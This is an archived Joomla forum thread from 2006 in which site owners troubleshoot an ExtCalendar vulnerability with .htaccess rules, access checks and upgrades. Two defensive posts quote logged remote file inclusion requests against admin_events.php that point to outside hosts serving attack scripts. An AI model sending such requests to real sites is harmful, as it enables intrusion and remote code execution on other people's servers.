[UPGRADE AVAIL.] ExtCalendar Vulnerability

For all Non-Joomla! security issues. ie 3pd Components etc.

Moderator: General Support Moderators

Forum rules
Locked
ddmobley
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Thu Jun 15, 2006 2:18 am

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by ddmobley » Mon Sep 25, 2006 7:38 pm

pdstein wrote:I will go ahead and follow your suggestion and add that code to the .htaccess file.  What I would like to know though is if extCalendar is actually vulnerable without it or this is just a precautionary measure.  If there is a real security vulnerability then there should be a change/patch to the PHP code not just some .htaccess code.  Again, I don't mind adding the .htaccess code just to be safe, but there isn't any known way someone could have exploited extcalendar without the .htaccess code, then I need to know that so I can keep looking for the security vulerability that was exploited.
The only "known" vulnerability was the link to admin_events.php.  There may be new exploits developed any day. 

The .htaccess code was designed to stop the passage of the mosConfig_absolute_path to directories and files beneath the web root. 

If your admin_events.php had the code in it to not run in standalone mode, then that is not where you were exploited.  Be sure your host has "register_globals" set to OFF.

 
technopuzzle
Joomla! Ace
Joomla! Ace
Posts: 1958
Joined: Thu Aug 18, 2005 5:53 pm
Location: Washington D.C. & Baltimore, MD Metro
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by technopuzzle » Mon Sep 25, 2006 7:58 pm

If you are running the latest most secure version of Joomla - version 1.0.11, then that code is already included in the default .htaccess file.
Thanks,
Roger Raymond
Techno Puzzle

ssherlock
Joomla! Apprentice
Joomla! Apprentice
Posts: 29
Joined: Wed Oct 05, 2005 9:29 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by ssherlock » Mon Sep 25, 2006 8:07 pm

unixboymd wrote: If you are running the latest most secure version of Joomla - version 1.0.11, then that code is already included in the default .htaccess file.
But it isn't loaded automatically when you load the patch...

User avatar
nathandiehl
Joomla! Champion
Joomla! Champion
Posts: 6044
Joined: Fri Aug 19, 2005 3:03 pm
Location: Indiana, USA
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by nathandiehl » Mon Sep 25, 2006 8:10 pm

ssherlock wrote: But it isn't loaded automatically when you load the patch...
that is because server require different 'tweaks' to the .htacess file

If i used the version that came with 1.0.11 w/out commenting one line, my site would crash. that is a GOOD thing.
Also, not everyone is using .htaccess, so it would be bad to make it active on every install!

This is indeed GOOD behavior. :)
If you're new to Joomla, Please read Anna's Joomla! Tips: http://forum.joomla.org/viewtopic.php?t=5503

http://nathandiehl.com | Find out what makes me tick

technopuzzle
Joomla! Ace
Joomla! Ace
Posts: 1958
Joined: Thu Aug 18, 2005 5:53 pm
Location: Washington D.C. & Baltimore, MD Metro
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by technopuzzle » Mon Sep 25, 2006 8:14 pm

No it isn't loaded automatically. This is because each server / hosting provider is set-up / configured differently. So you may have to tweak the file to get it to work with your servers configuration. If you need help with this you can ask your hosting provider or ask in the forums.

I am one of those that had to tweak it.
Thanks,
Roger Raymond
Techno Puzzle

ssherlock
Joomla! Apprentice
Joomla! Apprentice
Posts: 29
Joined: Wed Oct 05, 2005 9:29 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by ssherlock » Mon Sep 25, 2006 8:59 pm

nathandiehl wrote:
ssherlock wrote: But it isn't loaded automatically when you load the patch...
that is because server require different 'tweaks' to the .htacess file

If i used the version that came with 1.0.11 w/out commenting one line, my site would crash. that is a GOOD thing.
Also, not everyone is using .htaccess, so it would be bad to make it active on every install!

This is indeed GOOD behavior. :)
Oh I agree, it is just that the everyday user might not know about it.

alccad
Joomla! Intern
Joomla! Intern
Posts: 92
Joined: Tue Sep 05, 2006 12:36 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by alccad » Tue Oct 03, 2006 10:23 am

Hi everyone and please excuse a not perfect English.
I'm a newbie using joomla, and I'm having some troubles from Extcaledar 2.0 on my site, from whom it has been attacked using admin_events.php page.
I was running Joomla 1.0.10, now I've just updated it to 1.0.11 and I turned the component off in order to get further information about this exploit and try to fix it before pubblishing it again.
On this page  http://forum.joomla.org/index.php/topic,78781.0.html I realized that my admin_events.php was missing the "defined( '_VALID_MOS' ) or die( 'Restricted access' );" line: so I put it in but I'm not sure it is enough!
So, I hope to get some hints from this topic: first of all I'd like to ask You if I can go on using Extcal 2.0 and where can I get fixes, or if I should consider a different Scheduling component. I've found com_events, which seem to have similar functions, but I'm afraid it is less safe than extcalendar.
Last edited by alccad on Tue Oct 03, 2006 10:37 am, edited 1 time in total.

User avatar
nathandiehl
Joomla! Champion
Joomla! Champion
Posts: 6044
Joined: Fri Aug 19, 2005 3:03 pm
Location: Indiana, USA
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by nathandiehl » Tue Oct 03, 2006 1:28 pm

please see this sticky: http://forum.joomla.org/index.php/topic,79477.0.html

for info on which versions are secure, which are not, and where to find updates (if available).

note: simply turning off extcal2 doesn't protect you at all. the scripts can still run :( please do follow the link above and update extcal2, events and any other vunlerable components you have installed.

good luck!
If you're new to Joomla, Please read Anna's Joomla! Tips: http://forum.joomla.org/viewtopic.php?t=5503

http://nathandiehl.com | Find out what makes me tick

fireman
Joomla! Intern
Joomla! Intern
Posts: 96
Joined: Sun Aug 28, 2005 1:12 am
Location: Indianapolis, Indiana

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by fireman » Tue Oct 24, 2006 5:59 pm

how about a rewrite.
"...as for me and my house, we will serve the LORD."

ssherlock
Joomla! Apprentice
Joomla! Apprentice
Posts: 29
Joined: Wed Oct 05, 2005 9:29 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by ssherlock » Tue Oct 24, 2006 6:02 pm

fireman wrote: how about a rewrite.
Feel free

;)

fireman
Joomla! Intern
Joomla! Intern
Posts: 96
Joined: Sun Aug 28, 2005 1:12 am
Location: Indianapolis, Indiana

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by fireman » Thu Oct 26, 2006 7:48 pm

ssherlock wrote:
Feel free

;)
If I had the time...and more skill, I would.  I spend a great deal of time running a business so I know what I am talking about here. 


Truth is,  I do a little coding here and there but I am far removed from those days of hard core hacking.  I have to consider production, ROI (Return on Investment), and cost benefit analysis.  I can't afford to have the folks under me spend countless hours (I got that from another post) trying to fix the inexorable.

My suggestion was not to mock; berate or trifle with those who are putting in the hours.  Sometimes people get so deep into trying to fix, patch, and update, that if they would have taken the time to start from scratch, less time would have been required.  This fact is not always clearly seen by those who are "in the mix" or "in the fray" due to "tunnel vision".

Just an observation.

Mark
"...as for me and my house, we will serve the LORD."

scott_gb
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Thu Nov 16, 2006 5:45 pm
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by scott_gb » Thu Nov 16, 2006 6:20 pm

Recently I too was attacked by a hacker through my extCalendar component. In my Recent Visitor logs I was seeing variations of this:
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sitename/cmd.gif?
So after a search I found this forum, read through it and added the:
// Don't allow direct linking
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
but I continued seeing this request on my Recent Visitors log with a Http Code: 200 - which I think is telling me that it was successful.

So I decided to simply remove the component. But I continued seeing this request with a 200 code. Now I would assume I would see a 404 code since the files were all removed. But I didn't, so I read more. Saw the additions to the .htaccess that were recommended and added those. And this did seem to have an effect. Now I was seeing a 302 redirect code followed by my my index page and 200 code. But this still did not seem to completely solve the problem, because i was starting to see another variation of the above attack:
//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sitename/cmd.gif?
2 forward slashes before the link. This was followed by another 200 Http Code.

So here is what I did - and I am sure the experts will tell you that it may or may not be recommended (experts please advise):
What I noticed was that all of these attacks were coming from a libwww-perl/5.805 Agent. To my knowledge only hackers have used this agent to access my site. Regular visitors tend to use more common browsers like IE, Safari, Opera and Firefox. So I did a little research and found that I could add to my .htaccess another Rewrite that would forbid this agent altogether. I have added the following Condition to a list of known bad bots agents. Below is a simplified rule without the other offending agents.
RewriteCond %{HTTP_USER_AGENT} ^libwww.*
RewriteRule ^(.*)$ http://www.mysite.com/
After adding this each Recent Visitor attempt is followed by a Http Code 403 - forbidden. It is my hope that this has stopped any successful attacks.

To all  experts out there, feel free to tear my post apart. I have no ego in writing this. My intention is only to share my miserable existence.

fireman
Joomla! Intern
Joomla! Intern
Posts: 96
Joined: Sun Aug 28, 2005 1:12 am
Location: Indianapolis, Indiana

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by fireman » Thu Nov 23, 2006 6:14 pm

"...as for me and my house, we will serve the LORD."

User avatar
theflyingdutchman
Joomla! Explorer
Joomla! Explorer
Posts: 422
Joined: Wed Feb 01, 2006 4:53 pm
Location: 't schone brabant
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by theflyingdutchman » Thu Nov 23, 2006 7:38 pm

fireman wrote: finally, a calendar that works.

http://extensions.joomla.org/component/ ... Itemid,35/
looks gr8 indeed.
in my opinion i still miss a yearly based view to make a print for a complete year overview (for my purpose a needed feature)

cheers
Je moet toch ergens in geloven, ik geloof dat ik nog maar een biertje pak.

User avatar
vdrover
Joomla! Guru
Joomla! Guru
Posts: 619
Joined: Fri Mar 03, 2006 3:26 pm
Location: Canuck via MKE
Contact:

JCal Pro, a new fork of Extcalendar

Post by vdrover » Mon Nov 27, 2006 1:19 pm

fireman wrote: finally, a calendar that works.
http://extensions.joomla.org/component/ ... Itemid,35/
Looks like you beat me to it fireman, but in any case, here is the official announcement for this thread:

I am happy to announce that we have released JCal Pro.

All the details of the features as well as thorough documentation and forums can be found at the home of JCal Pro.

Cheers,
V-man
Last edited by vdrover on Mon Nov 27, 2006 1:22 pm, edited 1 time in total.
Victor Drover
https://watchful.net - Remote backup, update and security monitoring for Joomla.

User avatar
v0d00child
Joomla! Apprentice
Joomla! Apprentice
Posts: 18
Joined: Wed Nov 15, 2006 10:52 am
Contact:

Re: ExtCalendar

Post by v0d00child » Fri Dec 08, 2006 4:52 pm

Floranett wrote: Is there a new secure version of ExtCalender we can use?
I think I've missed something here... in my themes/default/theme.php it looks like the download I have someone has repaired the loop hole... anyone tested this for the vunerability, I really love this mod and would hate to have to give it up!!

Get the latest version of ExtCalendar at:
http://extcal.sourceforge.net
**********************************************
Modified 7/11/2006 by David McKinnis for Mambo/Joomla! version - _VALID_MOS check
*/

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

EDIT: Feeling rather silly, just jumped to the last post in the thread.... :)....  yeppieee... I'm going to install JCal Pro now!!
Last edited by v0d00child on Fri Dec 08, 2006 4:58 pm, edited 1 time in total.

User avatar
Joomlamahesh
Joomla! Apprentice
Joomla! Apprentice
Posts: 34
Joined: Mon Nov 28, 2005 5:00 pm
Location: Mumbai, India
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Joomlamahesh » Sat Dec 09, 2006 3:38 am

I have alredy upgraded the Ext Calendat and .htaccess. While scannin the log file today I found following type of accesses


/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ortaksohbet.com/lol1.txt
  Http Code: 200  Date: Dec 09 04:23:55  Http Version: HTTP/1.1  Size in Bytes: 58 
  Referer: - 
  Agent: libwww-perl/5.803 

Does this means somebody trying to use my server for some malicious purpose. I have got many such entries in my log file ?

This also means that the secure version of Ext Cal is not so secure. My RG=Off and I am not emulating also.
A man is not finished when he is defeated,
He is finished when he quits

Daniel Tulp
Joomla! Guru
Joomla! Guru
Posts: 630
Joined: Mon Oct 03, 2005 12:30 pm
Location: Arnhem
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Daniel Tulp » Sat Dec 16, 2006 8:37 am

if extcal won't be supported any more, will/ is there be some migration script to another calender/ events component?
My personal website: http://www.danieltulp.nl
My photo showcade: http://photo.danieltulp.nl

User avatar
rliskey
Joomla! Guru
Joomla! Guru
Posts: 828
Joined: Tue Jun 06, 2006 7:41 am
Location: California, Germany, Norway
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by rliskey » Fri Mar 23, 2007 4:28 pm

This topic strayed into a fork/development discussion. Good discussion, but it was not really security related. Has been moved to the 3RD Components forum.

 

Locked

Return to “3rd Party/Non Joomla! Security Issues”